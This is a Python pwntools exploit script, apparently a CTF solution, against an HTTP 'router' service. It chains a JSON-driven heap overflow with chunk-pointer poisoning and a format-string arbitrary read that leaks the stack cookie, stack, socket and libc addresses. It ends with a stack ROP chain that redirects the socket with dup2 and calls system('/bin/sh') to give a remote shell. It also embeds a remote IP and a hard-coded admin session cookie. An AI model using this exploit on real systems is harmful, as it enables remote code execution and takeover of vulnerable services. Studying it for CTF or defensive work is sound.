#!/usr/bin/env python2
from pwn import *

# Target binary and the libc to resolve symbols against.  The fixed gadget
# addresses further down (0x40a0f1/0x40a0f3) show the binary is non-PIE.
# With REMOTE=1 the challenge's shipped libc.so is used; locally the libc the
# binary links against is picked up automatically.
exe = context.binary = ELF("./router")
if args.REMOTE:
    libc = ELF("./libc.so")
else:
    libc = exe.libc

# Address handed out as the poisoned chunk for the format-string stage.  By
# its name it overlaps the end of the GOT; the value was found by hand for
# this binary and is not derivable from anything visible here.
got_end_chunk = 0x60f185

# Distance from a chunk's start to the first byte of caller-controlled data:
# 0x10 (chunk header) plus one, the extra byte presumably being the 0x7f
# marker heap_overflow writes in front of ``data``.
data_offset = 0x10 + 1
def heap_overflow(target_chunk, target_size, data, json="", p=False):
    """Send one POST /admin whose JSON body overflows a heap chunk so that
    ``data`` is written at ``target_chunk``.

    Every call opens a new connection and sends exactly one request; the open
    tube is returned and NOT closed here, so callers must close it (the
    callers in this file use ``with``).

    What the body does, as far as the string layout shows (the allocator
    details should be confirmed against the binary):
      * the string values are sized to carve chunks of ``filler`` and
        ``target_size`` bytes;
      * ``overflow`` runs one byte short of its own buffer and then supplies a
        fake chunk header: ``target_size | 1`` at +8 and ``target_chunk`` at
        +0x10 — the slot where a free chunk keeps its forward pointer, which
        looks like fastbin/tcache fd poisoning;
      * ``"%(small3)s": 0`` takes the corrupted chunk, and the following
        ``0: "%(data)s"`` allocation then presumably receives ``target_chunk``
        as its buffer.
    ``data`` is prefixed with ``\\ud8ff\\uffff`` escapes the target's JSON
    parser accepts but (by the variable's name) emits nothing for, so the
    allocation is ``target_size`` large while the real bytes land
    ``data_offset`` bytes into the chunk.

    Args:
        target_chunk: address the ``data`` allocation should be served from.
        target_size: chunk size to poison; must differ from the filler size.
        data: bytes to place at ``target_chunk + data_offset``.  They travel
            inside a JSON string, so a raw ``"`` (and presumably ``\\``)
            would break the request — see ``leak`` for the same constraint.
        json: extra JSON members appended to the object, e.g. fields the
            /admin handler needs before it renders a response.
        p: pause before sending so a debugger can be attached first.

    Returns:
        The pwntools tube with the request already sent.
    """
    # Target host, port and the admin session cookie below belong to the CTF
    # challenge this was written for; all three must be replaced for any other
    # target.  The cookie is a hard-coded credential, so treat the gist as such.
    conn = remote("51.15.88.183", 8080) if args.REMOTE else remote("localhost", 8080)
    if p:
        pause()
    # Filler strings must fall into a different size class than the poisoned
    # chunk so they are not served from the bin we are corrupting.
    filler = 0x50 if target_size != 0x50 else 0x40
    objsize = "o" * 0x20
    small1 = "x" * 0x10  # NOTE(review): never used below
    small2 = "c" * (filler - 0x10)
    small3 = "d" * (target_size - 0x10)
    # One byte short of ``small2``'s length, then a 0x7f byte (its exact role
    # in the target's parser is not recoverable here), then the fake header.
    # fit() fills bytes 0-7 with its default cyclic pattern; bit 0 of the size
    # is glibc's PREV_INUSE flag.
    overflow = small2.replace("c", "e")[:-1] + "\x7f" + fit({
        0x8: target_size | 0x1,
        0x10: target_chunk,
    })
    # In a Python 2 byte-string literal "\u" is not an escape, so this is the
    # literal 12-character text \ud8ff\uffff (an unpaired surrogate escape).
    # The integer division below relies on Python 2 semantics; under
    # Python 3 ``str * float`` raises TypeError.
    write_nothing = "\ud8ff\uffff"
    padding = write_nothing * ((target_size - 0x10) / 10)
    padding += "\x7f"
    data = padding + data
    # Deliberately NOT valid JSON (numeric keys, missing commas, the stray
    # ``1`` after the first value): this is what the target's own parser
    # accepts, and each oddity presumably drives an allocation — do not
    # "fix" it.
    payload = '''
{ "%(objsize)s": "%(objsize)s"1
0: "%(small2)s"
0: "%(small3)s"
0: "%(overflow)s"
"%(small3)s": 0,
0: "%(data)s",
%(json)s
}''' % locals()
    # Header newlines become CRLF; the body keeps bare LF, and Content-Length
    # is computed on the body as sent.  NOTE(review): as listed there is no
    # blank line between the Content-Length header and the body, i.e. no
    # CRLF CRLF terminator — if the listing did not drop one, this depends on
    # the target's lax HTTP parsing.
    request = '''
POST /admin HTTP/1.1
Host: aaa
Content-Type: application/json
Cookie: sessionid=0b71662a3b766be303db07f68a0f497090a7e15060eac6a75aab6643c74b15c9
Content-Length: {}
{}
'''.strip().replace("\n", "\r\n").format(len(payload), payload)
    conn.send(request)
    return conn
def do_printf(s, arg=0xdeadbeef):
    """Turn the heap overflow into one controlled format-string evaluation.

    The poisoned chunk is ``got_end_chunk``, so the written bytes land in the
    binary's data area.  Four pointer-sized symbols of the binary are
    overwritten relative to the chunk, and two strings are placed 0x100 bytes
    in: ``"%2$s"`` and the caller's format ``s``.  Judging by the symbol names
    the server then renders its /admin reply through these pointers, with
    ``s`` as the format and ``arg`` reachable as the second argument (via
    ``success_settings_saved``); the exact rendering path is not visible here.
    ``0x40BEF8`` is some address inside the non-PIE image whose meaning is not
    recoverable from this file.

    Args:
        s: format string the server will evaluate (the reply starts with its
           output; callers terminate it with a marker they can ``recvuntil``).
        arg: value exposed as the second printf argument, e.g. an address to
             read with ``%2$s``.

    Returns:
        The open tube from ``heap_overflow``; the caller reads and closes it.
    """
    base = got_end_chunk + data_offset
    fmt_addr = base + 0x100

    layout = {}
    layout[exe.symbols.body_template - base] = fmt_addr
    layout[exe.symbols.success_settings_saved - base] = arg
    layout[exe.symbols.http200ok_content - base] = fmt_addr - 8
    layout[exe.symbols.settings_template - base] = 0x40BEF8
    layout[0x100 - 8] = "%2$s\0"
    layout[0x100] = s + "\0"

    # Fields the /admin handler presumably needs to accept the "settings"
    # post; appended after the overflow members of the JSON object.
    extra_members = '''
"ssid": "",
"bssid": "",
"dns": ""
'''
    return heap_overflow(got_end_chunk, 0x70, fit(layout), json=extra_members)
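@MemLeak
@context.quiet
def leak(addr):
    """Arbitrary read: make the server print ``%s`` of ``addr``.

    Wrapped in MemLeak, so ``leak.u64(addr)`` and friends work and every byte
    read is cached.  Returning None tells MemLeak the address cannot be read
    this way; it then works around the gap with neighbouring reads.

    Unreadable addresses:
      * anything below 0x400000, the image base of this non-PIE binary;
      * any address whose little-endian encoding contains ``"`` — the pointer
        is embedded in a JSON string literal and a quote would end it early;
      * any address containing ``\\`` (0x5c).  The target's parser honours
        backslash escapes (the ``\\u`` padding in ``heap_overflow`` depends on
        that), so the byte would start an escape sequence and a corrupted
        pointer would be written.  The original only checked for ``"``.

    The reply is a C string, so the byte after the returned data is known to
    be NUL and is appended for MemLeak's benefit.
    """
    if addr < 0x400000:
        return None
    raw = p64(addr)
    if '"' in raw or '\\' in raw:
        return None
    with do_printf("%sENDOFDATA\n", addr) as c:
        return c.recvuntil("ENDOFDATA\n", drop=True) + "\0"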
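# Stage 1: leak the stack cookie and a stack pointer.  The printf argument
# positions (%19$, %22$) were determined by hand for this binary's frame and
# cannot be derived from anything in this file.  All three leak requests use
# ``with`` so the connection is closed even if the reply is not what we expect
# (the original left the first one to close manually).
with do_printf("%19$llx\n") as c:
    cookie = int(c.recvline(), 16)
success("stack cookie: %#x", cookie)

with do_printf("%22$llx\n") as c:
    stack_leak = int(c.recvline(), 16)
success("stack leak: %#x", stack_leak)

# The client's socket fd sits 0x5c bytes past the leaked stack pointer (found
# by inspection).  ``%s`` stops at the first NUL, so small fd values come back
# truncated; pad to 4 bytes before unpacking.  Named sock_fd rather than
# ``socket`` so it does not shadow the stdlib module of that name.
with do_printf("%sENDDATA\n", stack_leak + 0x5c) as c:
    sock_fd = u32(c.recvuntil("ENDDATA\n", drop=True).ljust(4, "\0"))
success("socket: %d", sock_fd)

# libc base from the resolved fwrite GOT entry (the binary is non-PIE, so the
# GOT address is fixed).
libc.address += leak.u64(exe.got.fwrite) - libc.symbols.fwrite

pop_rdi = 0x000000000040a0f3  # pop rdi; ret
pop_rsi = 0x000000000040a0f1  # pop rsi; pop r15; ret


def _rop_call2(func, rdi, rsi):
    """Gadget sequence for ``func(rdi, rsi)``.

    The rsi gadget also pops r15, so ``rsi`` is pushed twice: once for rsi
    and once as the throw-away r15 value (matches the original chain byte for
    byte).
    """
    return [pop_rdi, p64(rdi), pop_rsi, p64(rsi), p64(rsi), p64(func)]


# Stage 2: overflow into the stack.  The poisoned chunk is placed so that
# ``data_offset + 0x20`` falls on the saved cookie slot (stack_leak - 8);
# what follows is presumably the saved rbp (any value works) and then the
# return address, which starts the chain.
stack_chunk = stack_leak - 0x28

# dup2(sock_fd, 1/2/0) so the server's stdio is the client socket, then
# system("/bin/sh") and a clean exit(0) so the process does not crash noisily.
chain = [cookie, p64(0xdeadba5e)]
chain += _rop_call2(libc.symbols.dup2, sock_fd, 0x1)
chain += _rop_call2(libc.symbols.dup2, sock_fd, 0x2)
chain += _rop_call2(libc.symbols.dup2, sock_fd, 0x0)
chain += [pop_rdi, p64(stack_chunk + 0x100), p64(libc.symbols.system)]
chain += [pop_rdi, p64(0x0), p64(libc.symbols.exit)]

payload = fit({
    0x20 - data_offset: chain,
    # Command string at stack_chunk + 0x100, where the system() call above
    # points; the trailing newline is harmless to sh.
    0x100 - data_offset: "/bin/sh\n\0",
})

# A bare ``0: 0`` member is enough extra JSON for this request; the shell is
# then handed to the operator on the same connection.
with heap_overflow(stack_chunk, 0x40, payload, json="0: 0") as c:
    c.interactive()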